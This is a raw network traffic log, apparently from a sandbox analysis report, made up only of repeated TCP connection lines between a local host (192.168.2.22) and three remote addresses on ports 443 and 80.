                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
